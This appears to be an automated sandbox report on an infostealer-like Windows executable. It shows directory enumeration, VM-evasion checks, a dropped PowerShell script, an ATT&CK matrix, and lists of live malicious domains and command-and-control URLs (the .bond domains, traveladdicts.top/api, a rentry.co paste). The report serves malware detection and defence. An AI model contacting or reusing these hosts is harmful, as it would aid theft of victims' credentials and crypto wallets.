              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: 00000000.00000003.1908607385.000000000087B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              221
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              221
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory1
              Process Discovery
              Remote Desktop Protocol41
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager221
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets21
              File and Directory Discovery
              SSHKeylogging115
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1601483 Sample: #Ud835#Ude4e#Ud835#Ude40#Ud... Startdate: 28/01/2025 Architecture: WINDOWS Score: 100 19 rentry.co 2->19 21 traveladdicts.top 2->21 23 18.31.95.13.in-addr.arpa 2->23 29 Suricata IDS alerts for network traffic 2->29 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 37 8 other signatures 2->37 8 #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe 1 2->8         started        signatures3 35 Connects to a pastebin service (likely for C&C) 19->35 process4 dnsIp5 25 traveladdicts.top 172.67.202.141, 443, 49224, 49233 CLOUDFLARENETUS United States 8->25 27 rentry.co 104.26.3.16, 443, 49237 CLOUDFLARENETUS United States 8->27 17 C:\Users\user\...\KOZ4VON644XMYEN5.ps1, HTML 8->17 dropped 39 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->39 41 Query firmware table information (likely to detect VMs) 8->41 43 Found many strings related to Crypto-Wallets (likely being stolen) 8->43 45 3 other signatures 8->45 13 powershell.exe 7 8->13         started        file6 signatures7 process8 process9 15 conhost.exe 13->15         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe3%VirustotalBrowse
              #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe8%ReversingLabsWin32.Trojan.Delf
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              moonehobno.bond100%Avira URL Cloudmalware
              traveladdicts.top0%Avira URL Cloudsafe
              https://traveladdicts.top/api0%Avira URL Cloudsafe
              https://traveladdicts.top/api6Ic=0%Avira URL Cloudsafe
              https://traveladdicts.top/d0%Avira URL Cloudsafe
              noxiuos-utopi.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/z0%Avira URL Cloudsafe
              learnyprocce.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/r0%Avira URL Cloudsafe
              rainy-lamep.bond100%Avira URL Cloudmalware
              elfinyamen.bond100%Avira URL Cloudmalware
              https://traveladdicts.top:443/apitps://traveladdicts.top:443/api0%Avira URL Cloudsafe
              https://traveladdicts.top/0%Avira URL Cloudsafe
              cowertbabei.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/api20%Avira URL Cloudsafe
              http://crl.microXO0%Avira URL Cloudsafe
              https://traveladdicts.top/n)60%Avira URL Cloudsafe
              abaft-taboo.bond100%Avira URL Cloudmalware
              conquemappe.bond100%Avira URL Cloudmalware
              http://www.testlab2008.com/indices/submit.php?c=CD&i=0%Avira URL Cloudsafe
              https://traveladdicts.top:443/api0%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              traveladdicts.top
              172.67.202.141
              truetrue
                unknown
                rentry.co
                104.26.3.16
                truefalse
                  high
                  18.31.95.13.in-addr.arpa
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    moonehobno.bondtrue
                    • Avira URL Cloud: malware
                    unknown
                    traveladdicts.toptrue
                    • Avira URL Cloud: safe
                    unknown
                    rainy-lamep.bondtrue
                    • Avira URL Cloud: malware
                    unknown
                    learnyprocce.bondtrue
                    • Avira URL Cloud: malware
                    unknown
                    noxiuos-utopi.bondtrue
                    • Avira URL Cloud: malware
                    unknown
                    https://rentry.co/feouewe5/rawfalse
                      high
                      https://traveladdicts.top/apitrue
                      • Avira URL Cloud: safe
                      unknown
                      abaft-taboo.bondtrue
                      • Avira URL Cloud: malware
                      unknown
                      elfinyamen.bondtrue
                      • Avira URL Cloud: malware
                      unknown
                      conquemappe.bondtrue
                      • Avira URL Cloud: malware
                      unknown
                      cowertbabei.bondtrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtab#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0##Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                            high
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                              high
                              http://ocsp.sectigo.com0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                high
                                http://www.microsoft.copowershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://rentry.co/hZpowershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0##Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                        high
                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://rentry.co/static/icons/270.pnghZpowershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                              high
                                              https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.2258828661.0000000004D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://rentry.co/static/icons/512.pnghZpowershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.c.lencr.org/0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://traveladdicts.top/d#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000805000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.org/products/firefoxgro.all#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2258828661.0000000004D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://traveladdicts.top/api6Ic=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1760402571.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://traveladdicts.top/r#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
